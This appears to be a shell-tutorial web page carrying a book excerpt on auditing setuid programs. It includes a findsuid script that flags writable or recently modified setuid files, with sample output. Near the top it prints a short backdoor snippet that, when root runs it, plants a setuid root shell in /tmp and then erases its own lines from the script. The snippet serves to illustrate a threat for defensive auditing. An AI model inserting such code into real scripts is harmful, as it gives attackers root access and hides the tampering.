shell相关:指令篇 基础篇 脚本欣赏 编程实例 shell问问 shell视频教程 技巧篇 水平测试 E文资料 vi编辑器 高级Bash脚本编程指南
其他:mysql perl c语言
There are quite a few ways that ruffians and digital delinquents can break into a Unix system, whether they have an account or not, but few ways are as easy for them as finding an improperly protected setuid or setgid command.
In a shell script, for example, adding a few lines of code can create a setuid shell for the bad guy once the code is invoked by the unsuspecting root user:
if [ "${USER:-$LOGNAME}" = "root" ] ; then # REMOVEME
cp /bin/sh /tmp/.rootshell # REMOVEME
chown root /tmp/.rootshell # REMOVEME
chmod -f 4777 /tmp/.rootshell # REMOVEME
grep -v "# REMOVEME" $0 > /tmp/junk # REMOVEME
mv /tmp/junk $0 # REMOVEME
fi # REMOVEME
Once this script is run by root, a shell is surreptitiously copied into /tmp as .rootshell and is made setuid root for the cracker to exploit at will. Then the script causes itself to be rewritten to remove the conditional code (hence the # REMOVEME at the end of each line), leaving essentially no trace of what the cracker did.
The code snippet just shown would also be exploitable in any script or command that runs with an effective user ID of root; hence the critical need to ensure that you know and approve of all setuid root commands on your system. Of course, you should never have scripts with any sort of setuid or setgid permission for just this reason, but it's still smart to keep an eye on things.
The Code
#!/bin/sh
# findsuid - Checks all SUID files or programs to see if they're writeable,
# and outputs the matches in a friendly and useful format.
mtime="7" # how far back (in days) to check for modified cmds
verbose=0 # by default, let's be quiet about things
if [ "$1" = "-v" ] ; then
verbose=1
fi
for match in $(find / -type f -perm +4000 -print)
do
if [ -x $match ] ; then
owner="$(ls -ld $match | awk '{print $3}')"
perms="$(ls -ld $match | cut -c5-10 | grep 'w')"
if [ ! -z $perms ] ; then
echo "**** $match (writeable and setuid $owner)"
elif [ ! -z $(find $match -mtime -$mtime -print) ] ; then
echo "**** $match (modified within $mtime days and setuid $owner)"
elif [ $verbose -eq 1 ] ; then
lastmod="$(ls -ld $match | awk '{print $6, $7, $8}')"
echo " $match (setuid $owner, last modified $lastmod)"
fi
fi
done
exit 0
How It Works
This script checks all setuid commands on the system to see if they're group-or world-writable and whether they've been modified in the last $mtime days.
Running the Script
This script has one optional argument: -v produces a verbose output that lists every setuid program encountered by the script. This script should probably be run as root, but it can be run as any user that has access permission to the key directories.
The Results
I've dropped a "hacked" script somewhere in the system. Let's see if findsuid can find it:
$ findsuid
**** /var/tmp/.sneaky/editme (writeable and setuid root)
There it is!
$ ls -l /var/tmp/.sneaky/editme
-rwsrwxrwx 1 root wheel 25988 Jul 13 11:50 /var/tmp/.sneaky/editme
A huge hole just waiting for someone to exploit